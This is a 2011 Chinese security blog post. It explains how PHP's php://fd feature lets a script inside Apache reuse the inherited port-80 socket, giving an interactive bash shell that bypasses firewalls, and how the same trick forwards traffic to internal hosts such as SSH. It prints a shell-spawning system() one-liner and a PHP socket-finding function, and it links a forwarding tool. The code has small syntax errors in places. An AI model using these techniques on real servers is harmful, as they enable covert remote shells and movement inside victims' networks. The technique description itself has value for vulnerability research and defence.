GaRY's Blog

Beginning is always beautiful

PHP端口复用的利用

如果还有人记得我当年发在80sec上的那篇《Linux 系统文件描述符继承带来的危害》的话,应该记得当时这个问题已经被apache官方使用FD_CLOSEXEC修复了:由于在系统底层exec其他进程的时候,所有开启的FD就会被自动关闭,因此就没有办法使用system等php函数,在子进程如bash中继续操作原有开启的高权限文件描述符。
但是最近PHP 5.3.6引进了一个新特性:利用fopen("php://fd/fd_number", "w")的形式,可以直接打开并操作当前进程的文件描述符。基本相当于一个fdopen函数调用。
结合这两点,由于php本身的一种运行方式是以apache的mod方式在apahe进程中存在的,所以对于php来说,他的自身进程也就是apache的进程,所有apache原来在root下打开的文件描述符,他都能操作。于是乎,原有修补完毕的漏洞,经过PHP新功能的妙手回春,又重现江湖了。

那么究竟如何利用这个漏洞呢?在之前的那篇文章里,我曾经给出了一个例子,就是直接复用当前连接80端口的socket,生成一个交互性shell。当时我没有给出自动化查找当前连接80端口socket的实现,但实际上,在写文章的时候,我就私底下给出过一个利用shell工具自动化查找当前socket连接的方法:

system("ip=`netstat -ane | grep ${_SERVER['REMOTE_ADDR']} | grep ESTABLISHED | awk '{print \$8}'`;socket=`ls -alh /proc/self/fd | grep \$ip |awk '{print \$9}'`; python -c 'import pty;pty.spawn(\"/bin/bash\")' 1>&\$socket 0>&\$socket 2>&\$socket");

解读一下上面的伪 PHP shell 代码:通过比对netstat -ane(e参数的作用是输出socket号)的输出和/proc/self/fd(当前进程的文件描述符信息)的内容,找到相匹配的socket号,那就是当前连接的socket了,然后立刻重用之。很简单吧?

但当时的例子已经不能在apache补丁后使用了,因为他用到了子进程再重定向输入输出来实现端口复用。而现在由于不能使用子进程来做这些事情,因此所有难点就集中在如何自动化的查找当前连接的socket上。

仔细看上面那些代码的原理,不过是使用netstat来进行当前系统中socket信息的输出比对。既然如此,我只要手工实现netstat的功能即可。那netstat又是如何实现的呢?

实际上,netstat本身也是通过读取系统中的/proc/net/tcp(6)文件来实现对当前网络状态的监控输出的。我们只要依样画葫芦对此文件进行解析(主要是合并ipv4和ipv6的内容,然后从16进制转换成字符串形式的ip,端口),然后再比对一下,只要发现此socket的远程ip和端口和php中的$_SERVER['REMOTE_ADDR'],$_SERVER['REMOTE_PORT']相匹配即可。具体实现如下:

function find_socket(){
    // Get tcp connection status from /proc
    $net = file_get_contents("/proc/net/tcp");
    $net .= file_get_contents("/proc/net/tcp6");

    // Find fd from /proc 
    $dir = dir("/proc/self/fd");
    while (false !== ($e = $dir->read())) {
        // Find socket inode in /proc/self/fd.
        if (is_link("/proc/self/fd/".$e) && $e != "." && $e != ".."){
            if(preg_match("/socket:\[(\d+)\]/", @readlink("/proc/self/fd/".$e), $m1)){
                // Match every socket inode in /proc/net/tcp & /proc/net/tcp6. 
                // If it matchs this connection remote ip/remote port, bingo! We got it!

                if(preg_match("/.*${m1[1]}/", $net$m2)){
                    preg_match_all("/(\w{8}):(\w{4})/", $m2[0], $m3);

                    // decode ips
                    $sipstring = $m3[1][0][6].$m3[1][0][7].$m3[1][0][4].$m3[1][0][5].$m3[1][0][2].$m3[1][0][3].$m3[1][0][0].$m3[1][0][1];
                    sscanf($sipstring, "%x", $siplong);
                    $ripstring = $m3[1][1][6].$m3[1][1][7].$m3[1][1][4].$m3[1][1][5].$m3[1][1][2].$m3[1][1][3].$m3[1][1][0].$m3[1][1][1];
                    sscanf($ripstring, "%x", $riplong);
                    $sip = long2ip($siplong);
                    $rip = long2ip($riplong);

                    // decode ports
                    sscanf($m3[2][0], "%x", $sport);
                    sscanf($m3[2][1], "%x", $rport);

                    if ($rip == $_SERVER['REMOTE_ADDR'] && $rport == $_SERVER['REMOTE_PORT']){
                        $dir->close();
                        return $e// That is our socket fd.
                    }
                }
            }
        }
    }
    $dir->close();
    return false;
}

ok,FD一找到,剩下的就是生成bash了。这里也不能老样子使用system,得换一下使用proc_open(为什么自己想)。具体代码就不写了。直接上效果:



只要简单的一个GET,就可以直接获取交互式shell,穿透防火墙哦亲~

上篇文章中还提到利用此方法可以做内网的端口转发,从而一个80端口走遍内网。不过当时没有给出实现,其实也非常简单,只需要将bash换成nc就可以了。不过这里需要多加一个slave端,在本地监听端口,让本地程序连接此端口,然后在数据发送前,加上一个GET请求,然后直接转发即可。我这里也给一下效果:

首先在本地执行一下slave程序,我这里是自己写的一个python脚本,pr.py。

python pr.py http://www.target.com/t.php 127.0.0.1:22

第一个参数为我们的脚本地址,第二个参数就是想要转发的目标地址了。我这里用的是target的22端口,实际上可以是他任意的内网地址。执行后,pr.py就会在我的机器本地监听1234端口,等待其他程序连接了。所有发送到本机1234的数据都会被转发到target的22端口中。




看,网络连接中可以很清晰的看到我们的nc程序正在忠实的进行这转发操作,而我们的ssh连接也一切正常。
稳定,舒适,一个80端口一个连接,内网任我行。

具体实现,我放到下面了。如果你还有兴趣,就自己研究一下吧。例如多一个sock5代理,甚至只要给nc加一个参数就可以了。

代码下载点这里

posted on 2011-10-09 01:01 wofeiwo 阅读(8120) 评论(0)  编辑 收藏 引用 网摘 所属分类: PHP securitySecurity


只有注册用户登录后才能发表评论。
网站导航:

导航

<2024年3月>
252627282912
3456789
10111213141516
17181920212223
24252627282930
31123456

统计

留言簿(10)

随笔分类(90)

随笔档案(61)

搜索

最新随笔

最新评论